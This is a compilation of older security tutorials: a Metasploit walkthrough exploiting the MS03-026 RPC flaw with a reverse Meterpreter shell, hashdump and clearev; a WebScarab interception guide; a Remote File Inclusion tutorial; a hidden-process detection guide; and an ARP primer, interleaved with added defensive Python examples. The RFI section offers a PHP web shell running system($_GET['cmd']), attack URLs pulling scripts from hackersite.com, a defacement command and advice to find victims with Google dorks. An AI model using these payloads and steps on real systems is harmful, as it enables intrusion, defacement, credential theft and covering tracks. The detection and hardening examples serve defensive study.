Now that you have the list of RPC exploits in front of you, we need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command "info exploit/windows/dcerpc/ms03_026_dcom".

This command provides information such as available targets, exploit requirements, details of the vulnerability itself, and even references where you can find more information. This is shown in the screenshot below.
 
 
 
Step 5:  
 
The command "use <exploit_name>" activates the exploit environment for the exploit <exploit_name>. In our case we use the following command to activate our exploit:
"use exploit/windows/dcerpc/ms03_026_dcom"
 
 
From the above figure we can see that, after the use command, the prompt changes from "msf>" to "msf exploit(ms03_026_dcom) >", which indicates that we have entered the temporary environment of that exploit.
 
 
Step 6: 
 
Now, we need to configure the exploit as required for the current scenario. The "show options" command displays the various parameters which are required for the exploit to be launched properly. In our case, RPORT is already set to 135 and the only option to be set is RHOST, which can be set using the "set RHOST" command.

We enter the command "set RHOST 192.168.42.129" and see that RHOST is set to 192.168.42.129.
 
 
 
Step 7: 
 
The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.

As shown in the figure below, the "show payloads" command lists all payloads that are compatible with the selected exploit.
 
 
For our case, we are using the reverse TCP Meterpreter, which can be set using the command "set PAYLOAD windows/meterpreter/reverse_tcp"; it spawns a shell if the remote server is successfully exploited. Now again you must view the available options using "show options" to make sure all the required options are properly filled so that the exploit launches properly.
 
 
We notice that the LHOST for our payload is not set, so we set it to our local IP, i.e. 192.168.42.128, using the command "set LHOST 192.168.42.128".
 
 
Step 8: 
 
Now that everything is ready and the exploit has been configured properly, it's time to launch the exploit.

You can use the "check" command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all exploits, but it can be a real help before you actually exploit the remote server, to make sure the remote server is not patched against the exploit you are trying against it.

In our case, as shown in the figure below, our selected exploit does not support the check option.
 
 
The "exploit" command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system. 
 
 
The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 through the vulnerable port 135.
This is indicated by the change of prompt to "meterpreter >".
 
 
Step 9: 
 
Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server. We can use the "help" command to see which commands we can run on the remote server to perform the related actions, as displayed in the figure below.
 
 
Below are the results of some of the Meterpreter commands.

"ipconfig" prints all of the remote machine's current TCP/IP network configuration values.
"getuid" prints the server's username to the console.
"hashdump" dumps the contents of the SAM database.
"clearev" can be used to wipe all traces that you were ever on the machine.
 
 
 
Summary 
 
Thus we have successfully used the Metasploit framework to break into the remote Windows 2003 server and get shell access, which can be used to control the remote machine and perform any kind of operation.

Here are some potential uses of the Metasploit Framework:
  • Metasploit can be used during penetration testing to validate the reports of other automated vulnerability assessment tools, proving that a vulnerability is not a false positive and can be exploited. Care has to be taken because not only does it disprove false positives, it can also break things.
  • Metasploit can be used to test the new exploits that come up nearly every day on your locally hosted test servers to understand the effectiveness of the exploit.
  • Metasploit is also a great testing tool for your intrusion detection systems, to test whether the IDS succeeds in preventing the attacks we use to bypass it.
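The IDS-testing point above is where the exercise in Steps 7 and 8 pays off for the defender: the reverse TCP payload makes the exploited server open a connection back to the attacker shortly after the inbound connection on port 135. The following Python script is an added example (not part of the article and not Metasploit code) that turns that shape into a simple correlation rule over connection-log lines. The log format, the timestamps and the callback port 4444 are constructed for the example; the rule keys on direction and peer only, so it does not depend on which LPORT the attacker chose.

```python
from collections import defaultdict
from datetime import datetime

# Constructed connection-log lines (not from the article). Format:
#   <timestamp> <IN|OUT> <src_ip:port> -> <dst_ip:port>, as seen from the monitored server.
# Line 1: a peer connects to the RPC endpoint mapper (TCP/135) on 192.168.42.129.
# Line 2: two seconds later the server opens an outbound connection back to the same
#         peer, which is the shape of a reverse payload (4444 is just a constructed port).
SAMPLE_LOG = """\
2012-07-30T10:00:01 IN  192.168.42.128:51234 -> 192.168.42.129:135
2012-07-30T10:00:03 OUT 192.168.42.129:1038  -> 192.168.42.128:4444
2012-07-30T10:05:00 IN  192.168.42.200:49152 -> 192.168.42.129:135
2012-07-30T10:30:00 OUT 192.168.42.129:1040  -> 192.168.42.50:80
"""


def parse_line(line):
    """Turn one log line into a dict with a datetime and split endpoints."""
    ts, direction, src, _arrow, dst = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts), "dir": direction,
            "sip": sip, "sport": int(sport), "dip": dip, "dport": int(dport)}


def find_reverse_shell_candidates(log_text, watched_ports=(135,), window_seconds=30):
    """Flag a server that, within window_seconds of accepting an inbound connection on a
    watched port, opens an outbound connection back to the same peer. Servers normally
    answer on the inbound socket; a fresh outbound connection to the caller is unusual."""
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    inbound = defaultdict(list)   # (server_ip, peer_ip) -> timestamps of inbound hits
    hits = []
    for e in events:
        if e["dir"] == "IN" and e["dport"] in watched_ports:
            inbound[(e["dip"], e["sip"])].append(e["ts"])
        elif e["dir"] == "OUT":
            for t in inbound.get((e["sip"], e["dip"]), []):
                delay = (e["ts"] - t).total_seconds()
                if 0 <= delay <= window_seconds:
                    hits.append({"server": e["sip"], "peer": e["dip"],
                                 "port": e["dport"], "delay_s": delay})
                    break
    return hits


if __name__ == "__main__":
    for h in find_reverse_shell_candidates(SAMPLE_LOG):
        print(f"possible reverse shell: {h['server']} -> {h['peer']}:{h['port']} "
              f"{h['delay_s']:.0f}s after an inbound connection on a watched port")
```

Run against the sample, only the second line is flagged; the later connection to port 135 from 192.168.42.200 produces no alert because that host never receives a callback, and the outbound web request to 192.168.42.50 is unrelated to any inbound hit. A bind payload (the generic/shell_bind_tcp mentioned in the command list) would not match this rule; it needs a separate check for new listening ports on the server.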
 
 
Conclusion

This article presented a high-level overview of using Metasploit for penetration testing, with an example of exploiting an RPC vulnerability in a remote Windows 2003 server. Armed with this basic knowledge, along with more research, you can create your own exploits and perform penetration testing like never before.
 

Hacking Web Applications using WebScarab - Author: Abhinav_Singh

Introduction

In this short tutorial, we will see how to use WebScarab [Reference 1] to easily and transparently intercept web traffic. This is one of the basic steps in web application hacking and in the analysis of web security. Even casual hackers can use it to see what goes on behind the scenes while browsing a particular website.
WebScarab is a framework for analysing web applications by operating as an intercepting proxy, allowing the user to review and modify HTTP requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. This makes it one of the most powerful tools when it comes to web application security.

Here we will see how to setup WebScarab and then use it to intercept & analyze web traffic.
Setting up WebScarab

Before we proceed, you need to download and install WebScarab [Reference 1]. After you have installed it you will first have to set up your browser so that WebScarab can act as its proxy server.

I am taking the example of Firefox here but similar steps will apply to other web browsers also.
Here are the steps 
  •  Go to options => Advanced -> Network -> Settings. You will see the dialog as shown in the above screenshot.
  •  Then select the Manual Proxy configuration
  •  Now enter the following values.
  • HTTP proxy - 127.0.0.1 and port - 8008
This routes every web request from the browser through WebScarab, which acts as a local proxy.
Intercepting Web Traffic
Now start WebScarab and you will see the screen as shown below.
In the Intercept tab, select "Intercept request" and in the left-hand menu select the "Get" and "Post" options. WebScarab is now ready to intercept HTTP GET and POST requests.

Next, launch your browser and type any URL, for example http://google.com. You will see a window in WebScarab showing the intercepted HTTP GET request, as shown below. At this point you can also click the "Intercept Response" button so that it also intercepts the response coming back from the Google web server.
That is how simple it is. You can use this technique to analyze any web request and response going in and out of your browser.

But the real power of WebScarab lies in manipulating these requests and responses on the fly. Let me tell you, this can be very, very deadly. If you make the right changes to the HTTP request headers, you can easily send invalid values to the server. This is very useful in web application penetration testing.
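The reason this is useful, and the lesson for whoever runs the server, is that everything the proxy shows is under the client's control, including hidden form fields and cookies. The Python example below is added here and is not WebScarab's or the article's code. It parses a raw HTTP request of the kind the Intercept window displays (a constructed POST to a hypothetical shop, in which the hidden "price" field has been edited from 49.99 to 0.01 before forwarding), then contrasts a handler that trusts the client's value with one that recomputes the total from a server-side catalog and treats a mismatching client price as a tamper indicator. The catalog and item numbers are constructed.

```python
from urllib.parse import parse_qs

# Constructed raw HTTP request, as an intercepting proxy would display it. The client has
# changed the hidden "price" field from 49.99 to 0.01 before letting the request through.
TAMPERED_REQUEST = (
    "POST /checkout HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 26\r\n"
    "\r\n"
    "item=1001&qty=2&price=0.01"
)

# Server-side catalog (constructed): the only trustworthy source of prices.
CATALOG = {"1001": 49.99, "1002": 5.00}


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into method, path, version, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def form_fields(body):
    """Decode a urlencoded body into a flat dict (first value per field)."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def checkout_insecure(form):
    """Trusts the client-supplied price: anyone with a proxy can set it to anything."""
    return round(float(form["price"]) * int(form["qty"]), 2)


def checkout_secure(form):
    """Recomputes the total from the catalog and validates the quantity range.
    The client price is never used for the total; a mismatch is reported as tampering."""
    item = form.get("item")
    if item not in CATALOG:
        raise ValueError("unknown item")
    qty = int(form.get("qty", "0"))
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    tampered = "price" in form and abs(float(form["price"]) - CATALOG[item]) > 1e-9
    return round(CATALOG[item] * qty, 2), tampered


if __name__ == "__main__":
    req = parse_http_request(TAMPERED_REQUEST)
    fields = form_fields(req["body"])
    print("insecure total:", checkout_insecure(fields))      # 0.02
    print("secure total, tampered:", checkout_secure(fields))  # (99.98, True)
```

The same rule applies to every field a proxy can edit: session cookies, "role" or "isAdmin" parameters, and Referer or Host headers must be validated or re-derived on the server, since the browser is not the last thing that touches the request.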


At the end, you can click on the "Summary" tab in the main window of WebScarab, which shows complete details of all the intercepted requests and responses, as shown in the screen below.
Conclusion

In this starter guide, you have seen how to use WebScarab to intercept HTTP traffic and analyse it. The rest is up to you, and how far you can take it.
References

  1. WebScarab - Framework for Intercepting & Manipulating Web Traffic

Remote File Inclusion Tutorial

Introduction

RFI stands for Remote File Inclusion, a vulnerability that allows an attacker to include a custom-coded or malicious file on a website or server through a script. The vulnerability exploits poor validation checks in websites and can eventually lead to code execution on the server or in the website (an XSS attack using JavaScript). This time, I will be writing a simple tutorial on Remote File Inclusion, and by the end of the tutorial I suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability and, trust me, website hacking is not all about SQL injection. Using RFI you can literally deface websites, get access to the server and do almost anything. What makes it more dangerous is that you only need common sense and basic knowledge of PHP to execute this one; some BASH might come in handy as most servers today are hosted on Linux.
 
 
 
Starting with RFI
 
Let's get started. The first step is to find a vulnerable site; you can easily find them using Google dorks. If you don't have any idea, you might want to read about advanced password hacking using Google dorks, or use an automated tool to apply Google dorks through Google. Now let's assume we have found a vulnerable website:
 
http://victimsite.com/index.php?page=home
 
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. We can find ways around it since it uses the PHP include function to pull them in. Let's check it out.
 
http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt
 
I have included a custom script "evilscript" in text format from my website, which contains some code. Now, if it is a vulnerable website, any of these 3 things can happen:
 
  • Case 1 - You might have noticed that the URL containing "page=home" had no extension, but I have included an extension in my URL; hence the site may give an error like 'failure to include evilscript.txt.txt'. This can happen because the site may automatically add the .txt extension to the pages stored on the server.
  • Case 2 - In case it automatically appends something along the lines of .php, then we have to use a null byte '' in order to avoid the error.
  • Case 3 - Successful execution :)
 
Now, once you have battled around this one, you might want to learn what to code inside the script. You may get a custom-coded version of the infamous C99 script (too bloated but highly effective once deployed) or you might code yourself a new one. For this, knowledge of PHP might come in handy. Here we go:
 
<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);
?>
 
The above code allows you to exploit the include function and tests whether the site is RFI (XSS) vulnerable by running the alert box code; if successful, you can send custom commands to the Linux server in bash. So, if you are in luck and it worked, let's try our hands at some Linux commands. For example, to find the current working directory of the server and then to list files, we will be using the 'pwd' and 'ls' commands:
 
http://victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http://victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
 
What this does is send the command as the cmd parameter that our script reads, and the script then prints the working directory and lists the documents. Even better, you can almost make the page proclaim that you hacked it by using the 'echo' command:
 
 cmd=echo U r pwn3d by xero> index.php
 
It will then rewrite index.php and render it. In case it is a primitive website which stores pages with the .txt extension, you might want to put it alongside the .txt files. Now, as expected, we are the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff? Try the 'wget' command...

I leave the rest to your creativity !
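For the person maintaining a site like victimsite.com, the three cases above all stem from one mistake: building the include target from the raw page parameter. The Python example below is added here (it is not the tutorial's code and not PHP) and models that pattern so the two sides can be compared: resolve_page_insecure mirrors include($_GET['page'] . ".txt") with remote includes enabled, including the embedded-NUL truncation that older PHP versions applied and that Case 2 relies on; resolve_page_secure maps the parameter through an allowlist and never derives a path or URL from it. The page directory, the allowlist and the example page names are constructed; the hackersite.com URL is the tutorial's own.

```python
import os
import posixpath

# Constructed layout of the site (hypothetical, not from the tutorial).
PAGES_DIR = "/var/www/pages"
ALLOWED_PAGES = {"home": "home.txt", "about": "about.txt", "contact": "contact.txt"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def resolve_page_insecure(page):
    """Mirrors include($_GET['page'] . '.txt') with allow_url_include enabled.
    Returns ("remote", url) or ("local", path) for what would be included."""
    target = page + ".txt"
    # Older PHP versions treated an embedded NUL as end of string, so "evil.php\x00"
    # became "evil.php" and the appended extension vanished (Case 2 above).
    target = target.split("\x00", 1)[0]
    if target.startswith(REMOTE_SCHEMES):
        return ("remote", target)                      # remote file inclusion
    return ("local", posixpath.join(PAGES_DIR, target))  # also open to ../ traversal


def resolve_page_secure(page):
    """Hardened: the parameter is only a key into an allowlist. Anything else is
    rejected, so URLs, traversal sequences and NUL tricks never reach the include."""
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    return ("local", posixpath.join(PAGES_DIR, ALLOWED_PAGES[page]))


def is_safe_under(path, root):
    """Defence in depth for code that must build paths: the resolved path has to
    stay inside root after symlinks and ../ segments are collapsed."""
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    return os.path.commonpath([real_root, real_path]) == real_root


if __name__ == "__main__":
    for p in ("home", "http://hackersite.com/evilscript", "http://hackersite.com/evilscript.txt\x00"):
        print(repr(p), "->", resolve_page_insecure(p))
        try:
            print(repr(p), "->", resolve_page_secure(p))
        except ValueError as exc:
            print(repr(p), "-> rejected:", exc)
```

On the PHP side the equivalent hardening is the same allowlist plus allow_url_include=Off (and allow_url_fopen=Off where the application does not need it), so that even a bug elsewhere cannot turn an include into a remote fetch.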
 
 
 
Conclusion
 
In this basic tutorial, Rishabh explains the RFI vulnerability and how to play around with it.

Uncovering Hidden Processes on Windows System

The Real Problem

When you start your PC, a lot of processes will be running. Some processes run by default and some are started by you. As you keep installing more and more software, the process list grows bigger and bigger. Some day it reaches the stage where it gets difficult to manage those processes, and if in the meantime some spyware comes and sits on your machine, you can't easily make it out until something really bad happens.
 
 
Detection Tools

Here I will shed some light on various methods of detecting spyware or any malicious programs running on the computer, starting from the basic and moving to the advanced level.

Usually startup programs are managed through various registry settings. If you are an expert, then you can edit these registry settings yourself. You can find a good list of startup registry locations here.

Below are some very useful tools which can either be used alone or in combination with others.
 
1. MSConfig
The 'msconfig' tool comes with Windows. It not only shows you the list of processes which are started by default when you start your computer but also allows you to modify the execution of startup processes.

2. HijackThis
This is a very good tool which shows all startup entries (processes, BHOs, services, etc.) from non-Windows applications. This way you can easily find and knock off suspicious processes.
 
3. Autoruns
One more good tool is Autoruns from Sysinternals. This tool shows all startup entries (processes, services, drivers, Winlogon notify entries, Winsock providers, etc.). You can also make it display only non-Microsoft entries by selecting "Hide Microsoft entries" from the Options menu.
 
4. Process Explorer
You can use 'Process Explorer' from SysInternals.com to find out more detailed information about all the running processes.

Once you find the process or DLL, you want to know whether it is really spyware or some other kind of malware. You can find this out by consulting ProcessLibrary.com. This website provides information about a process or DLL to tell whether it is a legitimate process or not. You can also always use Google to find out more information about any suspicious-looking process.

5. BHORemover
BHO stands for 'Browser Helper Object', a plugin written for Internet Explorer to enhance its capabilities. But this feature is misused by many spyware programs, which monitor the user's browsing habits and also silently steal online credentials.

To eliminate such BHOs from the computer, I have written a tool called BHORemover, which scans and lists all installed BHOs on the system with detailed information. This helps in identifying malicious programs and removing them from the system.
 
6. WinServiceManager
WinServiceManager provides a single point of administration for managing various aspects of Windows services. It has more features and provides better management functionality than the built-in Windows service management console. It shows the list of non-Windows services, which allows the user to quickly identify and remove additional services; most of these are installed by spyware to monitor the user's activities.
 
7. RemoteDLL
Some spyware uses DLLs to monitor and control its life cycle. Usually these DLLs are injected into Windows processes such as explorer.exe, winlogon.exe, etc. to hide their presence. You can remove these DLLs from the process using the RemoteDLL tool.
 
8. Anti-Rootkits
All the above-mentioned tools are the basic ones for finding out more information about running programs. But there are stealthier programs, such as rootkits, which cannot be detected by normal programs. You need more sophisticated tools to view those programs.

There are a couple of rootkit detection tools, such as BlackLight from F-Secure, McAfee's Rootkit Detective, Rootkit Revealer from SysInternals.com and IceSword by PJF. IceSword is the most advanced of these and shows all hidden processes, services, drivers, SSDT hooks, message hooks, etc.
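What the rootkit detectors above have in common is the cross-view technique: enumerate the same thing (processes, files, registry keys) through two independent paths and report whatever appears in one view but not the other, since a rootkit that filters the high-level API usually does not filter the low-level one. The Python example below is added here and is not code from any of the tools named. It parses a constructed `tasklist /fo csv` listing as the API-level view (the real command prints that header row; the process rows are made up) and compares it against a second, constructed low-level view in which one extra process is present.

```python
import csv
import io

# Constructed output in the shape of `tasklist /fo csv` (the API-level view).
# The header row matches the real command; the process rows are made up.
TASKLIST_CSV = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Console","0","236 K"
"winlogon.exe","620","Console","0","3,024 K"
"explorer.exe","1204","Console","0","18,556 K"
"notepad.exe","1500","Console","0","4,112 K"
"""

# Constructed second view, as a rootkit detector would obtain it by walking kernel
# structures or brute-forcing PIDs instead of asking the user-mode API.
LOWLEVEL_VIEW = {
    4: "System",
    620: "winlogon.exe",
    1204: "explorer.exe",
    1500: "notepad.exe",
    1876: "svchost.exe",   # visible here only: hidden from tasklist
}


def parse_tasklist_csv(text):
    """Map PID -> image name from tasklist's CSV output."""
    reader = csv.DictReader(io.StringIO(text))
    return {int(row["PID"]): row["Image Name"] for row in reader}


def cross_view_diff(api_view, lowlevel_view):
    """Compare two PID -> name views.
    hidden:     in the low-level view only (classic hidden process)
    phantom:    in the API view only (stale entry or a view taken at a different moment)
    mismatched: same PID, different name (one of the views is lying)"""
    hidden = {pid: n for pid, n in lowlevel_view.items() if pid not in api_view}
    phantom = {pid: n for pid, n in api_view.items() if pid not in lowlevel_view}
    mismatched = {pid: (api_view[pid], lowlevel_view[pid])
                  for pid in api_view.keys() & lowlevel_view.keys()
                  if api_view[pid] != lowlevel_view[pid]}
    return {"hidden": hidden, "phantom": phantom, "mismatched": mismatched}


if __name__ == "__main__":
    diff = cross_view_diff(parse_tasklist_csv(TASKLIST_CSV), LOWLEVEL_VIEW)
    for kind, entries in diff.items():
        for pid, info in entries.items():
            print(f"{kind}: pid {pid} {info}")
```

Because processes start and exit all the time, a single difference between two snapshots is only a lead: take both views as close together as possible, repeat the comparison, and treat an entry that stays hidden across several rounds as the finding worth investigating.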
 
 
 
Conclusion

Antivirus or antispyware applications can't always protect you from new malicious programs. You need to defend your own system from these programs yourself. I hope this article has enlightened you to some extent in that direction.
 
 
References
 
    1. HijackThis: Remove hijacked entries from the system.
    2. Autoruns: System startup entries enumerator and eliminator.
    3. Process Explorer: Displays process details including loaded modules.
    4. BHO Remover: Scans and removes installed BHOs from the system.
    5. WinServiceManager: Manage Windows services from one place.
    6. RemoteDLL: Tool to inject or remove a DLL from a process.
    7. BlackLight: Lightweight rootkit detector from F-Secure.
    8. IceSword: Advanced rootkit detection tool.
    9. Rootkit Detective: Rootkit detection tool from McAfee.
    10. Rootkit Revealer: Sysinternals' rootkit detection tool.
    11. IceSword & Rootkit: Using IceSword to detect rootkits.

Tutorial on Basics of NIC, MAC and ARP - Author: Abhinav_Singh

Introduction

In this beginners guide, I am going to explain the basic & important terms of computer networks such as NIC, IP Address, MAC & ARP. This will greatly help you set up your network basics right before you look for advanced stuff.
 
 
Often we jump straight into using tools and learn quickly from the various technical papers, but we tend to forget the basics. This often causes us to lose our footing and eventually lose interest. From that perspective, this tutorial will help you get a stable grounding in network basics and get going!
 
 
 
Know the Terms - IP Address, NIC, MAC

You must be familiar with the term IP address. Just as your home has a mailing address, any computer or device connected to the internet has an address called the IP address. It can be either static or dynamic. If it is static, it remains unchanged every time you connect to a network; if it is dynamic, a local DHCP server grants you a new IP address every time you connect.

So with machines coming and going on networks, and IP addresses ever changing, how do other computers on your network find Redbeard? The secret (well, not really a secret; just a fact that veteran administrators know so well, they forgot to tell you) is this: every networked device actually has two addresses. One is the IP address, which might or might not change. The other is the MAC address, which is fixed to the device (can be changed too, read more here).

When you connect a computer to your Ethernet LAN, do you know what you're plugging the Ethernet cable into? From the outside, it looks like you're plugging it into a metal case, but you're not. Inside the case is a Network Interface Card (NIC). A NIC is a special hardware card within any networked device (computer, printer, router, etc.) that handles all the technical aspects of sending and receiving data packets over a computer network.

Like your mailing address at home, your computer's NIC has a unique address. This address must be unique, otherwise, network traffic cannot find its way to the right computer.

The distinctive address that identifies a NIC is called the Media Access Control (MAC) address. A MAC address is formatted as a six-byte hexadecimal number, like this:
 
00:90:7F:12:DE:7F
 
A MAC address is a unique character string, and since it identifies a specific physical device -- one individual NIC -- the MAC address, by convention, never changes for the life of the NIC. Two NICs never have the same MAC address (unless some manufacturer screws up royally [which has happened]). Because your NIC's MAC address is permanent, it's often referred to as the "real" or physical address of a computer.
 
 
 
Why do we need IP when we have MAC?
 
MAC addresses are fixed, hence they are not as scalable as IP addresses. IP addresses have several other features, like subnetting and supernetting, which give a logical understanding of where a machine sits in a network. These facilities are not available with MAC addresses.

Also, MAC addresses are not routable. The Internet Protocols will not treat them as the address of a source or destination. Hence IP addresses in many ways simplify our task.

The malleable IP address gives your network some flexible manageability. The never-changing MAC provides a specific, reliable address for a physical device.

Or you could say, we have the long and the short of it. IP addresses route a packet across the whole global Internet, while MAC addresses help the packet make the small, local hop between hardware devices. Sophisticated networking is possible because each of your networked devices has both a MAC and an IP address.

With that comes the next question: how do MAC and IP coordinate?
 
 
 
Let's bring up ARP
 
The simple definition that we study in local networking books is that ARP is a network layer protocol used to convert an IP address into a MAC address. Let's get into more detail.

We began by wondering, "How do devices on a local network become aware of one another?" NICs and MACs are important pieces of the answer, but your network must learn to pair a MAC address with the IP address for the same machine. It does so using a technique called Address Resolution Protocol (in short ARP).

Think of ARP as network roll call. Remember the first day of your college/school? At the beginning of class, the teacher called from a list of names, expecting you to reply when she called yours. She did this to associate your name with your face. Every student heard every name, but answered only to his or her own name. ARP uses a similar technique to associate an IP address to the MAC address.

Let's assign Abhinav the IP address 192.168.39.101, and suppose his NIC has the MAC address 00:A0:24:30:2E:13. And suppose he needs to send a file to Jaya, or more literally, to her computer. When Abhinav attempts to send Jaya a file, Abhinav first obtains Jaya's IP address. Upon seeing that the IP address is local (on the same subnetwork), Abhinav knows he is capable of sending the file to her if he learns the "real" (MAC) address associated with that IP address. To learn the MAC address, Abhinav does what your teacher did on the first day of school/college. He calls out to the entire local network asking that the computer with the IP in question reply "Here!" with a MAC address.

Let's say that Jaya has the IP, 192.168.39.148. To find the MAC address for Jaya, Abhinav would send the following (simplified) ARP request:
 
From (Abhinav's MAC address)   To (broadcast address)   Packet content
00:A0:24:30:2E:13              FF:FF:FF:FF:FF:FF        Who has 192.168.39.148? Tell 192.168.39.101.
 
Notice the special address in the "To" field above. That special address (all Fs) is the MAC broadcast address. Anything sent to that address goes to every computer on the LAN segment. All those computers receive the message but ignore it, because it doesn't pertain to them -- with the exception of Jaya. Because Jaya is 192.168.39.148, she replies with her MAC address, like this:
 
From (Jaya's MAC address)      To (Abhinav's MAC address)   Packet content
00:A0:24:30:4C:23              00:A0:24:30:2E:13            I have 192.168.39.148
 
This is how Abhinav finally succeeds in sending his file (not a love letter) to Jaya, after identifying her MAC or physical address. In short, Abhinav ARPed Jaya.

Here is a picture to demonstrate this process.
 
 
Having successfully ARPed, Abhinav stashes the newly learned MAC/IP pair in an ARP cache. The ARP cache is a small segment of memory your computer reserves to temporarily store a table of MAC addresses and their associated IP addresses. Your computer keeps this table for efficiency, so that it doesn't have to keep broadcasting ARP requests to computers it has already queried. If Abhinav needs to send something else to Jaya soon (maybe a love letter this time), Abhinav will obtain Jaya's MAC address from his own ARP cache rather than querying for it again.
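To make the exchange concrete, here is an added Python example (not from the tutorial) that builds the request and reply above as real Ethernet/ARP frames in the RFC 826 layout, parses them back, and keeps the ARP cache the last paragraph describes. It uses the tutorial's addresses for Abhinav (192.168.39.101, 00:A0:24:30:2E:13) and Jaya (192.168.39.148, 00:A0:24:30:4C:23); the resolve() helper, which simulates the other hosts on the segment with a dictionary, is an assumption of the example, and MAC addresses are normalised to lowercase. The cache also records a conflict when an IP it already knows is announced with a different MAC, which is the simplest indicator of ARP spoofing a defender can watch for.

```python
import ipaddress
import struct

BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet: 14-byte Ethernet header + 28-byte ARP.
    A request is sent to the broadcast MAC; a reply goes straight to the requester."""
    dst = BROADCAST_MAC if opcode == ARP_REQUEST else target_mac
    eth = mac_to_bytes(dst) + mac_to_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += mac_to_bytes(sender_mac) + ipaddress.IPv4Address(sender_ip).packed
    arp += mac_to_bytes(target_mac) + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def parse_arp(frame):
    """Decode the fields of an Ethernet/ARP frame produced by build_arp (or captured)."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", frame[14:22])
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return {"eth_dst": bytes_to_mac(frame[0:6]), "op": op,
            "sender_mac": bytes_to_mac(sha), "sender_ip": str(ipaddress.IPv4Address(spa)),
            "target_mac": bytes_to_mac(tha), "target_ip": str(ipaddress.IPv4Address(tpa))}


class ArpCache:
    """IP -> MAC table. learn() records a conflict when a known IP changes MAC."""

    def __init__(self):
        self.table = {}
        self.conflicts = []   # (ip, old_mac, new_mac)

    def learn(self, ip, mac):
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.conflicts.append((ip, old, mac))
        self.table[ip] = mac

    def lookup(self, ip):
        return self.table.get(ip)


def resolve(requester_ip, requester_mac, target_ip, cache, responders):
    """Simulate the roll call: answer from cache if possible, otherwise broadcast a
    request, let the owner of target_ip (from the constructed `responders` dict) reply,
    and cache the answer. Returns (mac or None, whether a broadcast was needed)."""
    cached = cache.lookup(target_ip)
    if cached is not None:
        return cached, False
    request = parse_arp(build_arp(ARP_REQUEST, requester_mac, requester_ip,
                                  "00:00:00:00:00:00", target_ip))
    for ip, mac in responders.items():          # every host sees the broadcast...
        if ip == request["target_ip"]:          # ...only the owner answers
            reply = parse_arp(build_arp(ARP_REPLY, mac, ip,
                                        request["sender_mac"], request["sender_ip"]))
            cache.learn(reply["sender_ip"], reply["sender_mac"])
            return reply["sender_mac"], True
    return None, True


if __name__ == "__main__":
    cache = ArpCache()
    lan = {"192.168.39.148": "00:a0:24:30:4c:23"}   # Jaya's NIC
    print(resolve("192.168.39.101", "00:a0:24:30:2e:13", "192.168.39.148", cache, lan))
    print(resolve("192.168.39.101", "00:a0:24:30:2e:13", "192.168.39.148", cache, lan))
```

The first call broadcasts and caches Jaya's MAC; the second is answered from the cache without touching the wire, which is exactly the saving the paragraph above describes. A later learn() for the same IP with a different MAC lands in cache.conflicts, and on a real host the equivalent check is to watch for ARP replies that change an existing entry.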
 
 
 
Conclusion

I hope this tutorial helps you clear most of your doubts about network basics. When you have sound basics, you can easily solve bigger problems.